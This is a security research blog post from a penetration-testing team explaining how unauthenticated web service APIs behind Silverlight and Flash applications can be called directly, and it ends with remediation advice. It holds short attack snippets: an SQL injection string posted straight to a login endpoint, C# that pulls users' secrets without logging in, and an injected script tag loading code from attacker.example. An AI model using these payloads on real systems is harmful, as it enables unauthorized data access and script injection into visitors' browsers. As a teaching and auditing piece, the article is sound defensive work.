Any Means Possible: Tales from Penetration Testing

Problems centered on web service APIs can potentially be just as dangerous as an SQLi vulnerability

When we aren't fighting crime, taking over the world, or enjoying a good book by the fire, we here on the eEye Research team like to participate in Any Means Possible (AMP) penetration testing engagements with our clients. For us, it's a great way to interact one-on-one with IT folks and really dig into the security problems they are facing. We sharpen our skills with real-world scenarios and practice the academic techniques presented in the industry, all while connecting better with our customers and identifying their security needs. During these engagements, we target a number of attack surfaces, ranging from exposed external server interfaces to client-side attacks launched against individual workstations. What I would like to talk about today is the web-based attack surface, and specifically a problem we see consistently during our AMP engagements.

When talking about web vulnerabilities, you can't even begin to broach the subject without someone throwing out Cross-Site Scripting (XSS) or SQL Injection (SQLi). Unfortunately, poor little web services never seem to get any attention in the mix. Web service vulnerabilities are arguably just as widespread and dangerous as the aforementioned classes of vulnerabilities, but with so little discussion around them, these issues are rarely identified and remediated. Let's fix that.

Vulnerabilities in web services stem from a developer's line of thinking that says, "I can trust the input from programs that I write." It's true that in some situations data coming from a known source you wrote can be trusted. This is not, however, true when that data travels over an untrusted medium, such as the Internet. A common mistake in web design and development that we still see frequently is a server relying on input that was parsed and filtered by the client's browser; for example, JavaScript running in the browser that does all of the filtering for malicious characters. Surely the JavaScript has filtered out all characters that could allow an attacker to insert malicious SQL queries into the back-end SQL database, right? Wrong: any data the server receives from a client's browser can just as easily be sent directly to the server from another, custom-written application. This means an attacker can bypass client-side SQLi and XSS protections entirely by sending requests straight to the server. Once traffic crosses the Internet, the server has no reliable way to determine how the data was sent; it may never have passed through the application you intended. This makes exploitation of these vulnerabilities a bit more obscure, but still entirely possible. The same holds true for web service APIs used by client-side applications.
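To make this concrete, here is a minimal sketch of what "sending the data directly" looks like. The endpoint, parameter name, and payload below are hypothetical stand-ins; the point is simply that none of the page's JavaScript validation ever runs.

using System;
using System.Collections.Generic;
using System.Net.Http;
using System.Threading.Tasks;

class DirectPostDemo
{
    static async Task Main()
    {
        // The browser's JavaScript never executes here, so any client-side
        // filtering it performs has no effect on what the server receives.
        using var http = new HttpClient();
        var form = new FormUrlEncodedContent(new Dictionary<string, string>
        {
            // A value the page's client-side validator would have rejected.
            ["username"] = "admin' OR '1'='1"
        });
        // Hypothetical endpoint; substitute the form handler under test.
        HttpResponseMessage response = await http.PostAsync("https://target.example/login", form);
        Console.WriteLine(await response.Content.ReadAsStringAsync());
    }
}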

Figure 1: Demo Microsoft Silverlight application. The left shows a failed attempt to log in and reveal the user's secret data; the right shows a successful login.

Many in-browser applications, such as those built with Adobe Flash and Microsoft Silverlight, communicate back to the server programmatically using web services. These services are exposed interfaces on the server that can be called directly from custom-written applications. In many situations, they expose potentially sensitive and privileged information that would otherwise not be accessible. Figure 1 shows a Microsoft Silverlight application constructed for demonstration purposes. This application is not vulnerable to XSS or SQLi and, to the average user, there is nothing about it that would let someone without a password access the legitimate user's secret data. However, what a lot of people don't take into consideration is that you have access to anything running in your browser. We can't pull the entire project down off of the server, but we can reverse-engineer the application interface running in the browser to see if anything potentially sensitive is being exposed.

The first thing that should be done when auditing web sites is to make sure all requests are logged through a local request proxy. For this example, I will be using Tamper Data (https://addons.mozilla.org/en-US/firefox/addon/tamper-data/) to log all of the requests that Firefox makes to our target Silverlight application. Right away, we see that the application requests an XAP file, shown in Figure 2; this is a fun thing to play around with that I will come back to later. As soon as we click the button on the page, we see the browser make a request to an SVC file; this is our web services interface, also shown in Figure 2.

Figure 2: Browser makes requests for an XAP file and an SVC file. The XAP file is loaded immediately into the browser when the application is started and the SVC file is loaded as soon as the user attempts to submit data back to the server.

Now, when we find a site serving up an SVC web services file, it's usually game over for that particular site. The reason is that developers tend to trust these interfaces, assuming that the only thing calling them is the client application they wrote. However, browsing to the service file directly in your favorite web browser will usually show you the basic interface of the exposed web service. The next step is creating a custom application to interface with the web service directly. You can use any language you want as long as it can talk to a web server, but I usually like to use C# in Visual Studio. Creating the application is quite easy - simply create a new C# project and add a service reference to the hosted SVC file. Visual Studio will automatically import references to everything exposed by the service. Figure 3 shows what is exposed by the sample service.

Figure 3: Object Viewer's list of the imported Web Services interface.
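For reference, the imported proxy for a service like this boils down to a contract along the following lines. This is a hand-written sketch based on the names in Figure 3, not the actual generated code (which is considerably more verbose), and the parameter and return types are assumptions.

using System.ServiceModel;

// Approximation of the service contract that Visual Studio reconstructs
// from the SVC file's published metadata. Signatures are assumed.
[ServiceContract]
public interface ILoginService
{
    [OperationContract]
    bool Login(string userName, string password);

    [OperationContract]
    string GetUserSecret(string userName);
}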

This service exports two functions: GetUserSecret and Login. The interesting thing here is that GetUserSecret takes a string and gives back a string, likely the secret data associated with the provided user. Now, it's perfectly possible that some form of authentication check happens on the server side when this function is called, ensuring no secrets are disclosed to unauthenticated clients. However, in many situations I have encountered, this is not the case. We can test whether the code properly checks for authentication by writing our own custom interface for the exposed web service. The following code snippet instantiates a client and queries for the secret data of two users without first authenticating with the server. Figure 4 shows the output from that program.

// Instantiate the proxy class generated from the SVC service reference
LoginService.LoginServiceClient client = new LoginService.LoginServiceClient();
// Request each user's secret directly, without ever calling Login()
Console.WriteLine("eEyeResearch's secret: " + client.GetUserSecret("eEyeResearch"));
Console.WriteLine("admin's secret: " + client.GetUserSecret("admin"));

Figure 4: Output from the code written to call the example service directly.

The output from our code shows that this exposed service is callable directly, without any authentication. The only information needed is the user's name and, as many of you know from attacks that have made the press over the past year, that information can be acquired quite easily through social engineering or brute-force attacks.

This vulnerability is quite straightforward, but I think many of you would be surprised how often we encounter issues very similar to this in real-world penetration testing scenarios. It's an easy mistake to assume that any malicious tampering with a web page will be done through a browser or front-end web application, but the simple truth is that this is not the case.

If you wanted to take this a bit further, you could examine the manifest files used by the client-side browser application. Remember the XAP file mentioned at the beginning? That file is actually a ZIP archive containing manifest information and the binary executable files used by the Silverlight application. Examining these files will show you all of the web service APIs that the application can potentially call, even the authenticated ones. This information has proven quite useful on various engagements. In one case, a simple web application that wasn't vulnerable to XSS or SQLi revealed a manifest of previously unknown web services, which eventually allowed us to download all of the information hidden behind the login page. Because those services were only referenced after the user had authenticated through the login screen, the APIs might never have been found in a purely unauthenticated audit had the manifest files not been checked for additional exposed interfaces.
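Since a XAP is just a ZIP archive, enumerating its contents takes only a few lines. A minimal sketch, assuming the XAP has been saved locally from the proxy log ("app.xap" is a placeholder name):

using System;
using System.IO.Compression;

class XapLister
{
    static void Main(string[] args)
    {
        string path = args.Length > 0 ? args[0] : "app.xap";
        // A XAP file is a ZIP archive; open it and list everything inside.
        using var xap = ZipFile.OpenRead(path);
        foreach (ZipArchiveEntry entry in xap.Entries)
        {
            // AppManifest.xaml names every assembly the application loads;
            // the DLL entries are the managed binaries discussed below.
            Console.WriteLine(entry.FullName);
        }
    }
}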

As if freely available manifest information weren't enough, the DLL files inside this archive can also prove to be a lot of fun. Ask any professional or hobbyist reverse engineer: managed languages such as Java and C# are quite easy to decompile, and there are freely available tools that do a good job of turning the compiled binaries back into the original (or very similar) high-level code. These DLLs represent only the client-side code that Silverlight executes in the browser, so you won't be getting the original server code out of this. However, a very common mistake is to incorporate application logic into the user interface as well. In these situations, a reversing session may yield valuable information about how the application works behind the scenes. In fact, this has been used in the past to gain all kinds of interesting information about target applications, including default credentials for the authenticated sections of an application, which had been hard-coded in a button click-event handler of the application's user interface.

Though this entire article has focused on Silverlight, the same concept applies to most other client-side web applications out there. Often, these applications rely on web services to communicate with the server, for both unauthenticated and authenticated communications alike, and developers often rely on the client-side application to do all of the relevant filtering and data integrity checking of the information sent to these services.

Along with performing authenticated actions from an unauthenticated application, we have used these service APIs to inject malicious data into hosted material. My favorite case was a Flash application, attacked as part of an AMP engagement, that called a web service API in the background. This API was used to lay text over greeting card images hosted on the affected server. The Flash application filtered input to allow only alphanumeric characters, but calling the API directly allowed us to insert malicious JavaScript on top of the images. Upon viewing the page or the image link directly, we gained the ability to execute arbitrary JavaScript in the user's browser or embed hidden iframes that could be used to host various exploits. The basic point here is that successful exploitation can yield a variety of things for the attacker. This isn't something that, when exploited, only dumps information or only changes the way a page is viewed; the limits of these vulnerabilities are determined only by the functionality of the web application.
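In the same spirit as the earlier snippet, the attack amounted to nothing more than calling the generated proxy with input the Flash client would have refused. Everything below is a hypothetical reconstruction; the service, method, and parameter names are invented for illustration.

// Hypothetical proxy for the greeting card overlay service.
CardService.CardServiceClient card = new CardService.CardServiceClient();
// The Flash client allowed only alphanumeric text; the service itself
// performed no such check, so script tags went straight onto the page.
card.SetOverlayText(1337, "<script src=\"http://attacker.example/x.js\"></script>");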

Problems centered on web service APIs can be just as dangerous as an SQLi vulnerability. It's somewhat unfortunate that SQLi has become so trendy, taking deserved attention away from the other interesting web vulnerabilities. Keep in mind that, though this was a heavily Microsoft- and Silverlight-focused example, the same issues apply across many different web application technologies. The issue is actually very easy to audit for, especially if you already know exactly what your application should and shouldn't be able to do at every level of authentication.

If you manage servers hosting websites, or the websites themselves, I recommend taking a few minutes to sit down and browse through each of these services. Be aware of exactly what is exposed on the external-facing interfaces. If anything looks out of place, try connecting directly to the service and see what information is exposed and available to your users. Try preventing the service from advertising its metadata by removing the mex endpoint binding and setting httpGetEnabled for service metadata to false in the web configuration file. This prevents users from reading the web service descriptions and makes it nontrivial to connect to and communicate with these services without prior knowledge of the internal workings of the application. These problems are quite easy to identify, potentially trivial to remediate, and can save an organization from a serious compromise if steps are taken to proactively identify and address them.
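For a WCF service, those two changes land in web.config along these lines. This is a minimal sketch with placeholder service and contract names; your bindings and behavior names will differ.

<system.serviceModel>
  <behaviors>
    <serviceBehaviors>
      <behavior>
        <!-- Stop serving the WSDL/help page over HTTP GET -->
        <serviceMetadata httpGetEnabled="false" />
      </behavior>
    </serviceBehaviors>
  </behaviors>
  <services>
    <service name="MyApp.LoginService">
      <endpoint address="" binding="basicHttpBinding" contract="MyApp.ILoginService" />
      <!-- Metadata exchange endpoint removed:
           <endpoint address="mex" binding="mexHttpBinding" contract="IMetadataExchange" /> -->
    </service>
  </services>
</system.serviceModel>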

•   •   •

This article was written by Jared Day, a researcher with eEye's Research Team led by Marc Maiffret.

If you are interested in learning more about our AMP services, you can visit our page here (http://www.eeye.com/services/penetration-testing).

More Stories By Jared Day

Jared Day is a Security Research Engineer on the eEye Research Team. He joined the team in 2010 and works primarily as a security advocate for eEye clients, participating in and leading Any Means Possible (AMP) penetration tests, as well as conducting custom private research related to malware, threat, and patch mitigation analysis.

